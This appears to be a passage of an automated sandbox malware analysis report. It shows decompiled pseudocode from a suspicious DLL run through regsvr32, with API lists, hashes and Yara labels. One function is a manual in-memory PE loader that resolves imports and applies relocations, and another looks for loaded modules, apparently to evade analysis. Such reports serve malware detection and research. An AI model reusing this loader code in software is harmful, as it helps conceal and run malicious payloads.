                            			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x1930590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x1930590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x1930590
						_t22 = _t133 + 0x114; // 0x19306a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x1930590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x19afc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x19afc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x1930590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x19afaa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x1930590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x1930590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x1930590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x1930590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x19afaa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x1930590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x1930590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x19afaa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x1930590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x1930590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x1930590
								_t117 = _t331 + 0x228; // 0x19307b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}


















































































                            0x10004d6d
                            0x10004d73
                            0x10004d79
                            0x10004d7e
                            0x10004d8c
                            0x10004d8f
                            0x10004dee
                            0x10004e00
                            0x10004e03
                            0x10004e0a
                            0x10004e0f
                            0x10004e14
                            0x10004e1b
                            0x10004e25
                            0x10004e2c
                            0x10004e37
                            0x10004e3c
                            0x10004e43
                            0x10004e49
                            0x10004e4b
                            0x10004e4c
                            0x10004e50
                            0x10004e5b
                            0x10004e60
                            0x10004e69
                            0x10004e6e
                            0x10004e76
                            0x10004e7d
                            0x10004e7e
                            0x10004e80
                            0x10004e9c
                            0x10004e9f
                            0x10004e9f
                            0x10004ea8
                            0x10004ead
                            0x10004ebd
                            0x10004ec5
                            0x10004eca
                            0x10004ed0
                            0x10004ed3
                            0x10004ed9
                            0x10004ef8
                            0x10004efe
                            0x10004eff
                            0x10004f00
                            0x10004f01
                            0x10004f02
                            0x10004f03
                            0x10004f0d
                            0x10004f11
                            0x10004f16
                            0x10004f19
                            0x10004f1b
                            0x10004f2d
                            0x10004f2d
                            0x10004f2f
                            0x10004f3b
                            0x10004f40
                            0x10004f46
                            0x10004f4f
                            0x10004f52
                            0x10004f54
                            0x10004f5f
                            0x10004f64
                            0x10004f69
                            0x10004f6e
                            0x10004f6e
                            0x10004f71
                            0x10004f78
                            0x00000000
                            0x10004f7e
                            0x10004f7e
                            0x10004f83
                            0x10004f87
                            0x10004f89
                            0x10004f8c
                            0x10004f8e
                            0x10004f94
                            0x10004f94
                            0x10004f8e
                            0x10004f96
                            0x10004f9b
                            0x10004fa1
                            0x10004fa3
                            0x00000000
                            0x10004fa9
                            0x10004fa9
                            0x10004fad
                            0x10005082
                            0x10005088
                            0x1000508e
                            0x10005099
                            0x1000509a
                            0x1000509b
                            0x1000509c
                            0x100050a2
                            0x100050a7
                            0x100050ad
                            0x100050b5
                            0x100050bb
                            0x100050be
                            0x100050cd
                            0x100050d4
                            0x100050d7
                            0x100050e4
                            0x100050e8
                            0x100050f5
                            0x100050fa
                            0x100050fd
                            0x100050ff
                            0x10005110
                            0x10005112
                            0x10005116
                            0x10005117
                            0x10005119
                            0x10005124
                            0x10005129
                            0x10005136
                            0x1000513a
                            0x1000513b
                            0x1000513d
                            0x10005145
                            0x10005146
                            0x1000514b
                            0x10005163
                            0x10005168
                            0x1000516b
                            0x1000516f
                            0x10005171
                            0x10005184
                            0x1000518e
                            0x10005192
                            0x1000519a
                            0x1000519b
                            0x100051a3
                            0x100051a4
                            0x100051a9
                            0x100051b5
                            0x100051bf
                            0x100051d1
                            0x100051dd
                            0x100051e2
                            0x100051e2
                            0x100051ec
                            0x100051f2
                            0x100051f2
                            0x10005119
                            0x100050ff
                            0x00000000
                            0x10005088
                            0x10004fb3
                            0x10004fb6
                            0x00000000
                            0x00000000
                            0x10004fbc
                            0x10004fc7
                            0x10004fc8
                            0x10004fc9
                            0x10004fca
                            0x10004fd0
                            0x10004fd5
                            0x10004fe9
                            0x10004fee
                            0x10004ff2
                            0x10004ffd
                            0x10005006
                            0x10005008
                            0x1000500c
                            0x1000500d
                            0x1000500f
                            0x1000501a
                            0x10005020
                            0x10005032
                            0x10005035
                            0x10005038
                            0x10005045
                            0x1000504d
                            0x10005057
                            0x10005069
                            0x10005075
                            0x1000507a
                            0x00000000
                            0x1000500f
                            0x10004fa3
                            0x10004edb
                            0x10004edb
                            0x10004ee1
                            0x10004ee3
                            0x00000000
                            0x00000000
                            0x10004ee5
                            0x10004ee9
                            0x100051f3
                            0x100051f8
                            0x100051fe
                            0x10005200
                            0x10005201
                            0x10005205
                            0x10005215
                            0x1000521a
                            0x1000521e
                            0x10005220
                            0x10005224
                            0x10005229
                            0x1000522b
                            0x1000522d
                            0x10005233
                            0x10005233
                            0x10005240
                            0x10005246
                            0x1000524c
                            0x10005251
                            0x1000526f
                            0x10005271
                            0x1000527d
                            0x1000527d
                            0x10005283
                            0x10005285
                            0x1000528b
                            0x1000529d
                            0x100052a3
                            0x100052af
                            0x100052b7
                            0x100052b7
                            0x100052b7
                            0x100052b9
                            0x100052bf
                            0x100052bf
                            0x10004eef
                            0x10004ef2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x10004ef2
                            0x10004ed9
                            0x10004e1d
                            0x10004e1d
                            0x00000000
                            0x10004e1d
                            0x10004d9b
                            0x10004da2
                            0x10004dab
                            0x10004dad
                            0x10004db3
                            0x10004dc4
                            0x10004dcd
                            0x10004dcd
                            0x10004dd9
                            0x10004de2
                            0x10004de7
                            0x10004dec
                            0x00000000
                            0x00000000
                            0x10004dec

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                            • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                            • lstrcpynW.KERNEL32(01930158,00000105), ref: 1000526F
                            • lstrcpynW.KERNEL32(01930368,00000105), ref: 10005283
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModulelstrcpyn
                            • String ID:
                            • API String ID: 3430401031-0
                            • Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                            • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                            • Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                            • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 52%
                            			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                            0x10012afb
                            0x10012b01
                            0x10012b0a
                            0x10012b0d
                            0x10012b10
                            0x00000000
                            0x10012c01
                            0x10012c05
                            0x10012c07
                            0x10012c15
                            0x10012d33
                            0x10012d3c
                            0x10012d3f
                            0x10012d43
                            0x10012d49
                            0x10012d51
                            0x10012d51
                            0x10012d59
                            0x00000000
                            0x10012d64
                            0x10012c1b
                            0x10012c24
                            0x10012c32
                            0x10012c35
                            0x10012c52
                            0x10012c59
                            0x10012c6b
                            0x10012c6b
                            0x10012c72
                            0x10012c82
                            0x10012c9a
                            0x10012c84
                            0x10012c8c
                            0x10012c8c
                            0x10012c9d
                            0x10012ca1
                            0x10012cb1
                            0x10012cd4
                            0x10012ce6
                            0x10012cb3
                            0x10012cc7
                            0x10012cc7
                            0x10012cf0
                            0x10012d0c
                            0x10012cf2
                            0x10012d01
                            0x10012d01
                            0x10012d14
                            0x10012d1d
                            0x10012d1d
                            0x10012d2b
                            0x00000000
                            0x10012c74
                            0x10012c76
                            0x00000000
                            0x10012c76
                            0x10012c72
                            0x00000000
                            0x10012c35
                            0x10012b18
                            0x10012b26
                            0x10012b2b
                            0x10012b36
                            0x10012b39
                            0x10012b3d
                            0x10012b3f
                            0x10012b4f
                            0x10012b58
                            0x10012b61
                            0x10012b69
                            0x10012b72
                            0x10012b7d
                            0x10012b83
                            0x10012b86
                            0x10012b89
                            0x10012b90
                            0x10012b97
                            0x00000000
                            0x00000000
                            0x10012ba2
                            0x10012bb0
                            0x10012bbb
                            0x10012bc5
                            0x10012bdd
                            0x10012bea
                            0x10012bea
                            0x10012bc7
                            0x10012bd2
                            0x10012bd2
                            0x10012bf1
                            0x10012bf1
                            0x10012bf9
                            0x10012bf9
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                            • LoadLibraryA.KERNEL32(?), ref: 10012C65
                            • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 384173800-0
                            • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                            • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                            • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                            • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x19afaa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x19afaa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x19afaa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                            0x10001c68
                            0x10001c75
                            0x10001c77
                            0x10001c7e
                            0x10001ce4
                            0x10001c8b
                            0x10001c90
                            0x10001c96
                            0x10001c9b
                            0x10001ca1
                            0x10001ca3
                            0x10001ca7
                            0x10001d15
                            0x10001d17
                            0x10001d99
                            0x10001d9f
                            0x10001d9f
                            0x10001ca9
                            0x10001cb1
                            0x10001cb1
                            0x10001cbd
                            0x10001cc3
                            0x10001cc5
                            0x00000000
                            0x00000000
                            0x10001cc7
                            0x10001cd1
                            0x10001cd7
                            0x10001cdd
                            0x10001cdf
                            0x00000000
                            0x10001cdf
                            0x10001cab
                            0x10001caf
                            0x00000000
                            0x00000000
                            0x00000000
                            0x10001caf
                            0x10001cee
                            0x10001cef
                            0x10001cf0
                            0x10001cf1
                            0x10001cf2
                            0x10001cf7
                            0x10001d01
                            0x10001d06
                            0x10001d0e
                            0x10001d29
                            0x10001d2c
                            0x10001d36
                            0x10001d41
                            0x10001d54
                            0x10001d56
                            0x10001d58
                            0x10001d5a
                            0x10001d5b
                            0x10001d63
                            0x10001d64
                            0x10001d6a
                            0x10001d10
                            0x10001d10
                            0x10001d10
                            0x10001d6b
                            0x10001d76
                            0x10001d79
                            0x10001d7f
                            0x10001d85
                            0x10001d90
                            0x10001d97
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                            • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                            • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                            • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x19afaa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x19afaa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x19afaa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
